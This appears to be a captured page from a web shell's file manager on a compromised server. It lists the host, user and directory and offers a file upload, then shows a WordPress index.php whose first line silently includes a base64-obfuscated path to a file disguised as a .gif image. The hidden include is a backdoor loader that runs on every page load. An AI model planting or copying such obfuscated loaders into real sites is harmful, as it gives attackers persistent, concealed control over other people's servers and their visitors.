Server : Apache System : Linux plesk.popquestion.pt 5.4.0-62-generic #70-Ubuntu SMP Tue Jan 12 12:45:47 UTC 2021 x86_64 User : marlanguiri.pt_33ez9hs6gzj ( 10020) PHP Version : 7.4.33 Disable Function : opcache_get_status Directory : /var/www/vhosts/marlanguiri.pt/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL21hcmxhbmd1aXJpLnB0L2h0dHBkb2NzL3dwLWluY2x1ZGVzL2ltYWdlcy93LWVjZmVmYmVkYmViYmFhYmNiZi5naWY=");?><?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }